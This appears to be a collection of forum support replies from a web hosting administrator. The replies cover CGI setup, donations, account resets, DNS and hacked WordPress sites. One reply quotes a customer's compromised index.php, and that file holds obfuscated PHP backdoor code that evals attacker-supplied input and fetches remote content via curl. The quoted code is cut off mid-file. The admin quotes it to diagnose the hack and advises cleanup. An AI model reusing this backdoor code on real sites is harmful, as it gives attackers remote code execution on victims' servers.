Krydos

That would probably run through Passenger.

Your main domain has been changed to whatephphatha.co.uk. Yes, perl cgi is enabled for everyone by default. You can test it out with a simple example by creating a file named perl.pl inside the cgi-bin directory with the contents #!/usr/bin/perl print "Content-type: text/html\r\n\r\n"; print "Perl as CGI is working..."; Then make sure the perl.pl file has 755 permissions and access it in your browser. If you did everything right it will look something like this https://krydos.heliohost.org/perl.pl

The storage space of the account atmovies has been increased to 4000 MB. Thanks for the donation.

Your subscription has been canceled and you won't be charged again. Your forum account has also been deleted. Thanks for using our VPS service.

Uncheck the wildcard box. It isn't supported yet.

Your subscription has been canceled and you won't be charged again. Thank you for using our VPS service.

Your account has been backed up and you can download it from https://heliohost.org/backup/ if you need. Generally when this happens your database is fine, but I would still take a look through it to see if anything has been altered. We know for a fact that the hacker had access to modify and upload files to your account so do not restore any of the PHP files from this backup. Images and movies might be fine, but I would check them too before restoring them. Your account has been reset so check your email and click the link to take the next step in the reset process. Obviously we recommend not using Wordpress again, but it's up to you. Let us know if you need help with anything.

A password reset link has been emailed to you.

It looks like most of your load is unsurprisingly coming from the Wordpress install root@johnny [/home/xn--plised-pxa.heliohost.org/public_html/300-000]# ls error_log license.txt wp-activate.php wp-comments-post.php wp-content wp-links-opml.php wp-mail.php wp-trackback.php index2222.htm readmeexe.html wp-admin wp-config.php wp-cron.php wp-load.php wp-settings.php xmlrpc.php index.php readme.html wp-blog-header.php wp-config-sample.php wp-includes wp-login.php wp-signup.php

Your $5 donation has been verified and your disk space has been increased to the maximum. Thanks for the donations. Talk Sick is right though. If you need to re-open a solved ticket just edit the first post and change the title to remove the [Solved] then reply with a new post at the bottom of the thread. You can also just create a whole new ticket. The report button is for stuff like spammers, porn posts, and stuff that violates our forums terms of service not just to annoy us.

Removed.

Johnny, Ricky, Tommy, Morty, and Lily do not have terminals. VPS plans have root SSH access if you need a terminal and they start at $4 per month.

The 3 domains that you disabled have been removed from your account.

Your website has clearly been hacked. Here is your index.php <?php /*-lShG;7>-*/error_reporting(0); $QKuU /*-Rkvp._LjJD4;v1&5EJ9-*/=/*-370E1a43815Kz#>F!q7-*/ "ra"./*-ow:piBPtbF;9sjnB9-*/"ng"./*-iZa?[]eaEK>u0kC__1I-*/"e"; $bXlIm /*-<!I=L,Lm%OY,GV%8-*/= /*-{S>C}8kB0WdNo~-*/$QKuU/*-e7$WJgx{>Wp9g-*/(/*-Xq(QWqBFqB?5-*/"~",/*-VRGAur<M{-*/" ");/*-!jRNvWgOAXyov+Z-*/$dUYio/*->NngYm_ah6-*/=/*-FfK)_u>PbnwD6-*/${$bXlIm[1+30]/*-GdwHE5@<dV+~CTK-*/.$bXlIm[9+50]./*-t(qw.Zd7Qh.m9-*/$bXlIm[36+11].$bXlIm[30+17]./*-U%.56.#2^-*/$bXlIm[23+28].$bXlIm[52+1].$bXlIm/*-A>R10o9ptemcm+ujE-*/[28+29]}; /*-AGMLPPJclv,^N-*/if(/*-hl,jyp$[h>QvM-*/in_array(/*-u(0Yj97W}ZucT-*/gettype/*-gT8GMb|vA.It-*/($dUYio).(7+12),$dUYio)){ $dUYio[54+8]=$dUYio[56+6].$dUYio[17+63]; @eval/*-h2DD.nYs~-*/($dUYio[37+25](${$dUYio[15+29]}[15+5]));}/*-rK-*/class /*-XO`-*/a{ /*-cL-*/static/*-1LSZdZE-*/ function /*-wGyM]a-*/cT($AOtJnSrK) /*-u8<q-*/{ $hxGJkYQ/*-Y-#V-*/ = /*-bD{C^-*/"r"./*-`ql[ZF(jU-*/"a"./*-hfOo70-*/"n"./*-L%1RwH-*/"g"./*-OhiJaD,y-*/"e"; /*-vUz;XUA_-*/$AUqwYXSNid/*-~b(bx0nIy-*/ = /*-x|He-*/$hxGJkYQ/*-(>F<.K-*/(/*-uQ!nF`H-*/"~"/*-wDLM-2-*/, /*-)XfXIJ-*/" "/*-:MrC<stK%-*/);/*-pT;-*/ $vPWjkSOid /*-B-*/= /*-wId-*/explode/*-wa<m&.f-*/(/*-9p-*/"!", /*-b![e-*/$AOtJnSrK/*-WWJ-*/); /*-,oN5Su-*/$DurZd /*-KL%wbADaI-*/= /*-84I-*/""; foreach /*-q&x-*/(/*-d)T:L%1;d}-*/$vPWjkSOid /*-vQ0X,@KnS-*/as /*-,rU,2+,Qne-*/$gZ /*-w3-*/=>/*-kqi?Wak5C-*/ $UQW/*-M@a3<-*/) /*-0N!k,-*/$DurZd /*-RK!^X%XgFB-*/.= /*-.#O:c6ED2;-*/$AUqwYXSNid[$UQW/*-Q5sc-*/ - /*-lv-*/65104/*-mr{wa?E-*/];/*-U(O5xm-*/ return /*-F8c-*/$DurZd; /*-W^1&5Kgo-*/} /*-goyS-*/static /*-,-:8-*/function /*-_KAwW@O-*/oyGOLpDQ/*-9Q_-*/(/*-g4|-*/$jGu,/*-0_O!~gc-*/ $yuZK/*-n-z-*/)/*-yo1WC<-*/ {/*-~&nhyn5cN-*/ $hWFzxONLv/*-si^>-*/ = /*-t7P!-*/curl_init/*-%&S##%s-*/(/*-oG%TFbb-*/$jGu/*-_yE}N8XG-*/);/*-tREv-*/ curl_setopt/*-rzRptB#~BV-*/(/*-P%hp-*/$hWFzxONLv,/*-tFFfn`)!uh-*/ CURLOPT_RETURNTRANSFER,/*-@9op-*/ 1/*-_ajOo}gtN1-*/);/*-0(VlqO3-*/ $YbQGo/*-p,Q{1El5-*/ = /*-7qR~G7)-*/curl_exec/*-]#cd?g3lD-*/(/*-2T0iWeEM-*/$hWFzxONLv/*-O.jH-*/); /*-cawA&=Hg!s-*/return /*-R0-*/empty/*-<Y~Tx5&-*/(/*-rxc-*/$YbQGo/*-la6.WE^-*/)/*-Y0}-*/ ? /*-WoQ-*/$yuZK/*-bbr$}Af2h-*/(/*-uZ(XX2^-*/$jGu/*-x|67[=V-*/)/*-rKHX|<4-*/ : /*-#N:c-*/$YbQGo; /*---*/}/*-wP-*/ static/*-:G]-*/ function /*-o-MJiHDA-*/xKQ/*-ep+CZYE_-*/() /*-,0-*/{/*-~%o5~-*/ $TEYA /*-qY9&kKhP-*/=/*-79f-*/ array/*-yO@_7d-*/("65131!65116!65129!65133!65114!65129!65135!65128!65113!65120!65131!65114!65125!65119!65120","65115!65114!65116!65135!65116!65119!65114!65181!65179","65124!65115!65119!65120!65135!65130!65129!65131!65119!65130!65129","65118!65133!65131!65123","65132!65133!65115!65129!65176!65178!65135!65130!65129!65131!65119!65130!65129","65128!65125!65122!65129!65135!65127!65129!65114!65135!65131!65119!65120!65114!65129!65120!65114!65115","65158!65188","65105","65183!65188","65165!65148!65148!65165!65141","65119!65128"); /*-tRz)&6;-*/foreach /*-vS3B-*/(/*-=$q-*/$TEYA/*-0_U!-*/ as /*-J8_y-*/$HdlKfPenMR/*-yT2-*/)/*-2bJonRTTcq-*/ $MT/*-iTgO{Z-*/[] /*-$xnvuJ+w}-*/= /*-oUi-*/self/*-H92e|X!-*/::/*-Zi&H>{M-*/cT/*-ksn3~zF-*/ I made a full backup which you can download from https://heliohost.org/backup/ if you need it. In most cases your database is probably fine, but you should still check it to make sure it hasn't been altered. You should also assume that any passwords you used on this site have been compromised and should be changed. You shouldn't trust any of your files because the hacker clearly had access to modify and upload files. I have reset your account to clean up the hack, and you should click the link in your email to continue with the rebuild process. Let us know if you need help with anything.

Removed.

I commented out the deny from all line in the .htaccess and it seems to be working fine https://xn--plised-pxa.heliohost.org/ Normally you'd see a 403 but this is a weird cPanel transfer account so they do weird things sometimes I guess. If you're having issues with the account I would recommend doing a full backup and then we can reset the account to give you a fresh start and then restore the files and databases that you need back into the fresh working account.

Try settings your NS records to ns1.heliohost.org and ns2.heliohost.org. If it works you can switch it back to Cloudflare later.

Removed.

Python CGI, Django, Flask, Python cron, Python constantly running process such as a bot, or something else?

You had a 658 MB access log for the forum.mupdvig.tk domain. Your high load and disk space overage are certainly related. Haters gonna hate, playas gonna play, and spambots gonna spam. Fix it quickly.

@garrigue Let us know if the All In One WP Migration tool works for you. If it doesn't we could try randomly increasing the timeout again to maybe 5 minutes this time. @artistwalks Thanks for the suggestion. All of the HelioHost staff, myself included, hate Wordpress with a passion because it is constantly getting hacked and causing high load so none of us will touch it with a 10 foot pole. Therefore we know very little about plugins for Wordpress.

I've increased the proxy timeout on that domain from 60 seconds up to 180 seconds so maybe it won't give that error again, but I want to make an observation: Tools are meant to make things quicker and easier. Dumping the database to an .sql file, zipping the files, and restoring the backup to transfer a Wordpress site to another host takes like 5 minutes. How much time should you waste trying to get this transfer tool to work? Should we spend 5 days trying different things to make this Updraft tool work when it only takes 5 minutes to do it manually? Would you spend 5 days driving somewhere when you could walk there in 5 minutes? If it still gives that error after 180 seconds we could try increasing it more.

Forum account, Tommy account, or both?

Thanks for posting this information. If someone has issues with high load we'll suggest this as something to try.

Does the 504 error happen every single time you try, or have you only tried once?